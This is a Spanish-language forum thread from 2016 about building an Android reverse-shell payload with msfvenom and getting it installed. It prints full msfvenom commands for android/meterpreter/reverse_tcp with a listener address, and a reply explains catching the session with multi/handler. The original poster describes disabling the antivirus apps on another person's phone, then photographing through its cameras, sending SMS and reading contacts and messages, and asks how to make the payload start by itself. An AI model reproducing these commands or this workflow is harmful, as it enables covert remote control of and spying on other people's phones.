Título: problema con payload en android Publicado por: hckcrck en 26 Junio 2016, 16:02 pm Hola a todos, tengo un problema al instalar un payload en un teléfono android, he generado al payload con msfvenom y no se si lo he hecho de la forma correcta, dejo el comando:
Código: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk También le he añadido: Código: msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk Código: No Arch selected, selecting Arch: dalvik from the payload Este es el proceso: Msfvenom genera el payload con la extensión .apk, lo paso a un soy experia tipo (reliquia :laugh:) y pongo handler en escucha, cuando voy a instalar el archivo .apk me sale el instalador, muestra los permisos, le doy a aceptar y sale como si se instalase, pero dice "la aplicación no está instalada" y sale de la instalación sin que el handler pille nada. Que puedo estar haciendo mal? Lo mas seguro es que sea lo que me advierte el propio msfvenom, pero en el tutorial no tenían ningún problema sin esos comandos. Título: Re: problema con payload en android Publicado por: GreenArrow77 en 26 Junio 2016, 18:12 pm hola,
por lo que tengo entendido, tu quieres conseguir una shell remota infectando a un android con un payload que generas con msfvenom (que el comando que yo he visto esta bien, por tanto intuyo que la aplicación/payload se crea correctamente), y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a traves de la meterpreter conseguir una shell remota? si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android victima con comandos linux y ya esta. ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload? un saludo y a ver si lo solucionamos -by secu posdata: el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería: "msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk" Título: Re: problema con payload en android Publicado por: hckcrck en 27 Junio 2016, 21:02 pm Hola gracias por responder,
Citar el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces Jajaja me lo figuraba, pero soy bastante nuevo y al ver que no me funcionaba, decidí probar mas cosas a ver que pasaba, no he conseguido solucionar el problema, pero si se "cual" es, y eso me preocupa, veréis porque El problema no es el payload o msfvenom, es el teléfono, busqué en google, y resulta que surge cuando en el teléfono hay otra aplicación con el mismo certificado, por ejemplo si quieres instalar una versión posterior de una app y tienes la antigua todavía instalada en el teléfono. De modo que decidí probar con otro "sujeto", y conseguí instalarla ;-), algo que me decepcionó bastante fue que lo detectaron todos los antivirus :rolleyes: tuve que desinstalarlos todos, después todo fue bien, conseguí una shell remota y aunque no conseguí escalar privilegios, si pude hacer algunas cosillas que me dejaron sorprendido :D, ver por las dos camaras (lo único que cada imagen que me manda hace sonar "clic" de la cámara, muy discreto no es :xD), enviar sms, ver los contactos sus mensajes y mas ;D Aquí viene la parte que me preocupa, el error de "la aplicación no esta instalada" me salió en el nuevo teléfono varias veces, ya que le instalé mas de un payload, quería conseguir conectarme a el fuera de lan (conseguido :)), pero en el primer teléfono por que sale? es la primera vez que instalo un payload en el :o puede ser que alguien lo aya hecho antes que yo? Aprovecharé el tema para plantear otra duda, de vez en cuando pierdo la conexión con la shell remota, y me cierra la sesión, es un fastidio tener que volver a ponerlo a la escucha cada vez que ocurre, no sería mucho problema si no fuera por que no consigo que el payload se inicie automáticamente, cada vez que quiero conectarme tengo que pulsar el icono de la app, no hay ninguna forma de hacer que el payload se inicie solo y no tener que hacerlo? Agradezco cualquier ayuda, gracias. Título: Re: problema con payload en android Publicado por: OscarXirau en 16 Diciembre 2016, 17:28 pm http://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/
|